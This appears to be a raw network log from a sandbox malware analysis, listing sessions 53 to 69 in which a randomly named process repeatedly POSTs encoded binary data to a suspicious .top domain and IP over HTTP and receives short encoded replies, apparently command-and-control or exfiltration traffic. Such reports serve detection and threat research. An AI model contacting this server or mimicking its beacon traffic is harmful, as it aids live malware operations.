                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          53  192.168.2.4  64743  80.211.144.156  80  764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:52:50.795362949 CEST  319  OUT  POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:51.150543928 CEST  2532  OUT
                                                          Sep 8, 2024 11:52:51.471774101 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:51.681163073 CEST  158  IN  HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:51 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          54  192.168.2.4  64744  80.211.144.156  80  764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:52:51.809571028 CEST  319  OUT  POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:52.165838957 CEST  2532  OUT
                                                          Sep 8, 2024 11:52:52.478072882 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:52.678463936 CEST  158  IN  HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:52 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          55  192.168.2.4  64745  80.211.144.156  80  764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:52:52.813249111 CEST  319  OUT  POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:53.166174889 CEST  2532  OUT
                                                          Sep 8, 2024 11:52:53.480302095 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:53.612720966 CEST  158  IN  HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:52 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          56  192.168.2.4  64746  80.211.144.156  80  764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:52:53.746280909 CEST  319  OUT  POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:54.103331089 CEST  2532  OUT
                                                          Sep 8, 2024 11:52:54.430629969 CEST  25  IN  HTTP/1.1 100 Continue


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          57  192.168.2.4  64747  80.211.144.156  80  764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:52:54.547180891 CEST  319  OUT  POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1400
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:54.900271893 CEST  1400  OUT
                                                          Sep 8, 2024 11:52:55.230669022 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:55.432596922 CEST  308  IN  HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          58  192.168.2.4  64748  80.211.144.156  80  764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:52:54.668401957 CEST  319  OUT  POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:55.026333094 CEST  2532  OUT
                                                          Sep 8, 2024 11:52:55.335742950 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:55.536885023 CEST  158  IN  HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          59  192.168.2.4  64749  80.211.144.156  80  764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:52:55.668061972 CEST  295  OUT  POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:56.025175095 CEST  2532  OUT
                                                          Sep 8, 2024 11:52:56.349761009 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:56.480427027 CEST  158  IN  HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          60  192.168.2.4  64750  80.211.144.156  80  764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:52:56.606375933 CEST  319  OUT  POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:56.962762117 CEST  2532  OUT
                                                          Sep 8, 2024 11:52:57.477365017 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:57.478491068 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          61 | 192.168.2.4 | 64751 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:57.605982065 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:57.962711096 CEST | 2532 | OUT | Data Raw: 5e 5b 5c 50 5a 58 5b 5e 5c 5a 51 56 57 5f 57 50 50 51 5e 50 54 54 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^[\PZX[^\ZQVW_WPPQ^PTTSDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%,1*=##(Z=,+'<*/$;R$<">!^+5'['74Z-#G X/1
                                                          Sep 8, 2024 11:52:58.298803091 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:58.434309006 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:57 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          62 | 192.168.2.4 | 64752 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:58.560159922 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:58.915844917 CEST | 2532 | OUT | Data Raw: 5e 5d 5c 56 5f 5e 5b 58 5c 5a 51 56 57 53 57 5d 50 58 5e 50 54 5b 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]\V_^[X\ZQVWSW]PX^PT[SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&;!)_>_7^ #,*+Y$,'09;Y5=_<+$4[-+#G X/
                                                          Sep 8, 2024 11:52:59.222522020 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:59.437028885 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:58 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          63 | 192.168.2.4 | 64753 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:59.559429884 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:59.915791988 CEST | 2528 | OUT | Data Raw: 5e 5d 5c 51 5f 5e 5e 5d 5c 5a 51 56 57 5b 57 57 50 51 5e 5e 54 5c 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]\Q_^^]\ZQVW[WWPQ^^T\SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%],)9;4##></Y3?!/4';!-1(@$$ -#G X/)
                                                          Sep 8, 2024 11:53:00.233508110 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:00.441806078 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:59 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          64 | 192.168.2.4 | 64754 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:00.453584909 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1400
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:00.808160067 CEST | 1400 | OUT | Data Raw: 5e 5a 59 52 5f 5f 5b 5b 5c 5a 51 56 57 5b 57 57 50 59 5e 5a 54 5c 53 45 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^ZYR__[[\ZQVW[WWPY^ZT\SETRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&;1^)( 0Z>?#01_;;W$4#.[(&$7:;#G X/)
                                                          Sep 8, 2024 11:53:01.137973070 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:01.342783928 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:00 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 25 0a 30 11 0c 02 20 2e 2c 0f 3e 2c 31 51 3a 13 2f 01 2a 39 39 43 2a 20 34 52 2a 3c 31 02 3d 15 36 18 29 2c 2c 5b 20 32 2c 05 31 1f 28 5e 03 11 23 5b 35 10 3e 5e 29 07 21 00 28 21 2c 5d 3d 3c 30 00 36 34 0e 52 21 3b 34 5e 20 28 22 51 29 2a 31 09 3b 42 21 41 3a 23 2a 55 22 24 2d 57 0c 12 20 57 3c 2d 34 0b 37 33 26 01 31 3d 25 58 30 26 2a 1d 3e 16 3a 51 3c 16 3d 04 25 54 27 1d 24 3d 39 58 29 3b 22 5f 33 07 27 12 35 07 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: %0 .,>,1Q:/*99C* 4R*<1=6),,[ 2,1(^#[5>^)!(!,]=<064R!;4^ ("Q)*1;B!A:#*U"$-W W<-473&1=%X0&*>:Q<=%T'$=9X);"_3'5$S-"T=\V


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          65 | 192.168.2.4 | 64755 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:00.582159996 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:00.931631088 CEST | 2532 | OUT | Data Raw: 5b 58 59 54 5f 5e 5e 5a 5c 5a 51 56 57 52 57 50 50 5d 5e 5d 54 5d 53 42 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [XYT_^^Z\ZQVWRWPP]^]T]SBTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%[."-]>9/#>^3?",7;S'#">.<6$$<-+#G X/
                                                          Sep 8, 2024 11:53:01.241775990 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:01.368607998 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:00 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          66 | 192.168.2.4 | 64756 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:01.496551037 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:01.853368998 CEST | 2532 | OUT | Data Raw: 5b 5f 59 55 5a 59 5e 5d 5c 5a 51 56 57 5f 57 52 50 51 5e 5d 54 5a 53 45 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [_YUZY^]\ZQVW_WRPQ^]TZSETRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%.!=9'!0Z(?,$/68483_85)?@'044.#G X/1
                                                          Sep 8, 2024 11:53:02.168904066 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:02.374027967 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:01 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          67 | 192.168.2.4 | 64757 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:02.497122049 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:02.853390932 CEST | 2532 | OUT | Data Raw: 5b 50 59 56 5f 5a 5e 5b 5c 5a 51 56 57 5d 57 52 50 58 5e 59 54 5b 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [PYV_Z^[\ZQVW]WRPX^YT[SFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&,12=: V8>#\0,9^;3/5-_+'^07,-#G X/9
                                                          Sep 8, 2024 11:53:03.162311077 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:03.296821117 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:02 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          68 | 192.168.2.4 | 64758 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:03.416939020 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:03.775230885 CEST | 2532 | OUT | Data Raw: 5e 59 59 56 5f 5a 5b 5b 5c 5a 51 56 57 58 57 52 50 5a 5e 5a 54 5d 53 46 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^YYV_Z[[\ZQVWXWRPZ^ZT]SFTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/!9]?* ! ;*+_0,=//'*+6-2)&'[$7.#G X/-
                                                          Sep 8, 2024 11:53:04.085779905 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:04.212657928 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          69 | 192.168.2.4 | 64759 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:04.340317011 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:04.697263002 CEST | 2532 | OUT | Data Raw: 5b 5a 5c 56 5a 58 5b 5b 5c 5a 51 56 57 5e 57 56 50 58 5e 50 54 5f 53 47 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Z\VZX[[\ZQVW^WVPX^PT_SGTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%/1%_);]!3$><$'?*;B?S%*8"-)?&3Z3#9#G X/5
                                                          Sep 8, 2024 11:53:05.028278112 CEST | 25 | IN | HTTP/1.1 100 Continue
